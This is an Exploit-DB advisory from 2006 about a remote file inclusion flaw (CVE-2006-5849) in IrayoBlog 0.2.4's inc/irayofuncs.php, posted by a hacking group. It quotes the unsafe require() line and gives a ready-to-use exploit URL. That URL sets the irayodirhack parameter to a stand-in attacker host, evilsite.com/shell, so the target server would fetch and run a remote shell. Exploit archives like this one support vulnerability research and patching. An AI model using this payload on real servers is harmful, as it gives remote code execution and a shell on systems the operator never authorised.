IrayoBlog 0.2.4 inc/irayofuncs.php Remote File Include Vulnerability

2006-11-08T00:00:00
ID EDB-ID:2741
Type exploitdb
Reporter DeltahackingTEAM
Modified 2006-11-08T00:00:00

Description

IrayoBlog 0.2.4 (inc/irayofuncs.php) Remote File Include Vulnerability. CVE-2006-5849. Webapps exploit for php platform

                                        
                                            *********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name :irayoblog-alpha-0.2.4

* Class = Remote File Inclusion ;
 
* Download =http://ovh.dl.sourceforge.net/sourceforge/irayoblog/irayoblog-alpha-0.2.4.tar.gz

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

----------------------------------------------------------------------------------------------------------
- Vulnerable Code

    require($irayodirhack."/inc/configdefaults.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell?



----------------------------------------------------------------------------------------------------------

Special Thanks :  Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha

**********************************************************************************************************

# milw0rm.com [2006-11-08]